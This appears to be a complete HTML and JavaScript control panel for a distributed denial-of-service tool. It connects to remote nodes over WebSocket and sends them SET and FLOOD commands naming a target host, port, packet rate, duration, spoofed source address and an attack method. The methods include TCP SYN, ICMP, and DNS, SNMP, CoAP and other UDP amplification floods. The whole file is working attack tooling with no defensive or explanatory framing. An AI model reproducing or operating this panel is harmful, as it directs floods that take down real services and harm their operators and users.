<!DOCTYPE html>
<html lang="ru">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Master Panel</title>
	<script>

	function sleepb(ms) {
		const start = Date.now();
		while (Date.now() - start < ms);
	}

	let sockets = new Map();
	let iscond=false;
	
	function connect() {
		const url = document.getElementById("wsurl").value.trim();
		if (!url||sockets.has(url)) {
			alert("Invalid URL or it is already connected.");
			return;
		}

		const socket = new WebSocket(url);

		socket.onopen = () => {
			sockets.set(url, socket);
			iscon=1;
			updateConnectionList();
			updateConnectionStatus();
		};

		socket.onclose = () => {
			sockets.delete(url);
			updateConnectionList();
			updateConnectionStatus();
			iscon=0;
		};

		socket.onerror = (err) => {
			socket.close();
			iscon=0;
		};
	}
	function sendabort() {
		const command = "ABORT\r\n";
		sockets.forEach((socket, url) => {
			if (socket.readyState === WebSocket.OPEN) {
				socket.send(command);
				sleepb(100);
			}
		});
	}

	function sendcmd() {
 		const host = document.getElementById("host").value.trim();
                const port = document.getElementById("port").value.trim();
                const time = document.getElementById("time").value.trim();
                const pps = document.getElementById("pps").value.trim();
                const method = document.getElementById("method").value;
                const unlimit = document.getElementById("unlimit").value;
                const source = document.getElementById("source").value;
                const random = document.getElementById("random").value;
                const srcport = document.getElementById("srcport").value;

		const command = `SET ${host} ${port} ${method} ${unlimit} ${source} ${pps} ${time} NULL ${random} ${srcport} 0\r\n`;

		sockets.forEach((socket, url) => {
			if (socket.readyState === WebSocket.OPEN) {
				socket.send(command);
				sleepb(100);
			}
		});
		const flood="FLOOD\r\n"
		sockets.forEach((socket, url) => {
			if (socket.readyState === WebSocket.OPEN) {
				socket.send(flood);
				sleepb(100);
			}
		});
	}

	function updateConnectionList() {
		const list = document.getElementById("connections");
		list.innerHTML = "";

		sockets.forEach((socket, url) => {
			const li = document.createElement("p");
			li.textContent = url;

			const btn = document.createElement("button");
			btn.textContent = "Disconnect";
			btn.style.marginLeft = "15px";
			btn.onclick = () => {
				socket.close();
			};

			li.appendChild(btn);
			list.appendChild(li);
		});
	}

	function updateConnectionStatus() {
		const statusElement = document.getElementById("connection-status");
		if (iscon) {
			statusElement.textContent = "Connected";
			statusElement.style.color = "Lime";
		} else {
			statusElement.textContent = "Disconnected (update page)";
			statusElement.style.color = "red";
		}
	}
	window.onload = () => {
		connect();
	}
	</script>
	<style>
	:root {
		--main-bg-color:	#010409;
		--line-color:		Gray;
		--text-color:		Snow;
		--link-color:		Azure;
		--log-entry-color:	#707070;
		--ipd-hover-color:	#909090;
		--ipd-hover-bcolor:	#202020;
		--ipd-bcolor:		black;
		--tit-border-color:	#5d5d5d;
		--log-entry-a-color:	MediumSeaGreen;
		--log-entry-recv-color:	SteelBlue;
		--log-entry-type-color:	GoldenRod;
	}

	* {
		padding:		0;
		margin:			0;
		box-sizing:		border-box;
	}


	.header_container {
		max-width:		900px;
		padding:		1rem;
		font-size:		16px;
		display:		flex;
	}


	.header_container>a {
		text-decoration:	none;
		color:			var(--text-color);
	}


	body {
		background-color:	var(--main-bg-color);
		font-family:		monospace;
		font-size:		14px;
		color:			var(--text-color);
	}


	hr {
		border:			none;
		border-bottom:		1px solid var(--line-color);
		max-width:		900px;
		margin-left:		auto;
		margin-right:		auto;
	}


	a {
		text-decoration:	underline;
		color:			var(--link-color);
	}
	p {
		text-decoration:	underline;
		margin-top: 10px;
		margin-left: 10px;
		color:	magenta;
	}


	header {
		min-height:		5vh;
		border-bottom:		1px solid var(--line-color);
		align-items:		center;
	}


	.container {
		max-width: 500px;
		min-height: 30vh;
		padding-top: 6rem;
		padding-bottom: 6rem;
	}
	.concontainer {
		background:		Black;
		min-width:500px;
		min-height:260px;
		border:		solid gray 1px;
		margin-top: 100px;
		padding-bottom: 6rem;
	}



	#recvSpan, #hostSpan, #hostSpan2,
	#hostSpan3 {
		display:		inline-block;
	}


	#recvSpan {
		width:			150px;
	}


	#hostSpan {
		width:			300px;
	}


	#ipd {
		background:		Black;
		width:			100%;
		white-space:		nowrap;
		overflow-x:		none;
		display:		inline-block;
		transition:		background 0.2s;
	}


	#ipd:hover {
		color:			var(--ipd-hover-color);
		background:		var(--ipd-hover-bcolor);
	}


	#tit {
		text-align:		center;
		border:			1px solid var(--tit-border-color);;
	}


	.log-entry {
		color:			var(--log-entry-color);
		text-decoration:	none;
	}


	.log-entry .received {
		color:			var(--log-entry-recv-color);
	}


	.log-entry .type {
		color:			Snow;

	}

	input {
		background-color:	Black;
		color:			Lime;
		text-decoration:	underline;
		transition:		color 0.2s;
	}
	.wrapper {
		display: flex;
		justify-content: center;
		align-items: flex-start;
		gap: 1rem;
	}

	input:hover {
		color:			Red;
		font-weight:		bold;
	}

	select {
		background-color:	Black;
		font-weight:		bold;
		color:			Red;
		text-decoration:	underline;
		border:			none;
		transition:		background 0.2s;
		transition:		color 0.2s;
	}

	select:hover {
		background-color:	Red;
		color:			white;
	}
	select:focus {
		outline:		none;
		border:			none;
	}
	button {
		background-color:	Black;
		font-weight:		bold;
		color:			Snow;
		padding:		2px 30px;
		border-color:		White;
		border:			solid 1px;
		cursor:			pointer;
		transition:		color 0.2s;
	}
	button:hover {
		color:			Red;
	}
	button:active {
		background-color:	Red;
	}

	footer {
		border-top:		1px solid var(--line-color);
		min-height:		5vh;
	}
	</style>
</head>
<body>

	<header>
	</header>
	<div class="wrapper">
	<div class="concontainer">
		<ul id="connections"></ul>
	</div>
	<div class="container">
		<div id="connection-status" style="font-size: 20px; font-weight: bold;">
			Check connetion
		</div>
			<br>
			<div id="ipd" class="log-entry">
				<span id="hostSpan">
					<span class="type">
						<label>WebSocket URL: </label>
					</span>
				</span>
				<input type="text" id="wsurl" value="ws://localhost:8080">
			</div>
		<br>
		<hr>
		<br>
		<div id="log-entries">
			<div id="ipd" class="log-entry">
				<span id="hostSpan">
					<span class="type">
						<label for="host">host (ipv4 or dns)</label>
					</span>
				</span>
				<input type="text" id="host">
			</div>

			<div id="ipd" class="log-entry">
				<span id="hostSpan">
					<span class="type">
						<label for="unlimit">unlimit (max speed)</label>
					</span>
				</span>
				<input value="1" type="text" id="unlimit">
			</div>

			<div id="ipd" class="log-entry">
				<span id="hostSpan">
					<span class="type">
						<label for="port">port</label>
					</span>
				</span>
				<input value="80" type="text" id="port">
			</div>

			<div id="ipd" class="log-entry">
				<span id="hostSpan">
					<span class="type">
						<label for="time">time (in sec)</label>
					</span>
				</span>
				<input value="10" type="text" id="time">
			</div>

			<div id="ipd" class="log-entry">
				<span id="hostSpan">
					<span class="type">
						<label for="pps">pps (packet per second)</label>
					</span>
				</span>
				<input value="500" type="text" id="pps">
			</div>

			<div id="ipd" class="log-entry">
				<span id="hostSpan">
					<span class="type">
						<label for="source">source (ipv4)</label>
					</span>
				</span>
				<input value="NULL" type="text" id="source">
			</div>

			<div id="ipd" class="log-entry">
				<span id="hostSpan">
					<span class="type">
						<label for="random">random mehod</label>
					</span>
				</span>
				<input value="NULL" type="text" id="random">
			</div>

			<div id="ipd" class="log-entry">
				<span id="hostSpan">
					<span class="type">
						<label for="srcport">source port</label>
					</span>
				</span>
				<input value="ARAND" type="text" id="srcport">
			</div>


			<br>
			<br>
			<div id="ipd" class="log-entry">
				<span id="hostSpan">
					<span class="type">
						<label for="method">method</label>
					</span>
				</span>
				<select id="method">
					<option value="">-- SELECTED --</option>
					<option value="0">esp</option>
					<option value="1">icmp echo</option>
					<option value="2">tcp syn</option>
					<option value="3">ip empty</option>
					<option value="4">udp dns</option>
					<option value="5">tcp tfo</option>
					<option value="6">udp discord</option>
					<option value="7">udp snmp</option>
					<option value="8">udp default</option>
					<option value="9">udp echo</option>
					<option value="10">udp ard</option>
					<option value="11">udp dvr</option>
					<option value="12">udp sadp</option>
					<option value="13">udp coapv2</option>
				</select>
				</div>
				<br>
				<br>
				<hr>
				<br>
				<br>
				<button onclick="sendcmd()">FLOOD</button>
				<button onclick="sendabort()">STOP</button>
				<button onclick="connect()">CONNECT</button>
			</div>
		</div>
	</div>

	</div>

	<footer>
	</footer>
</body>
</html>

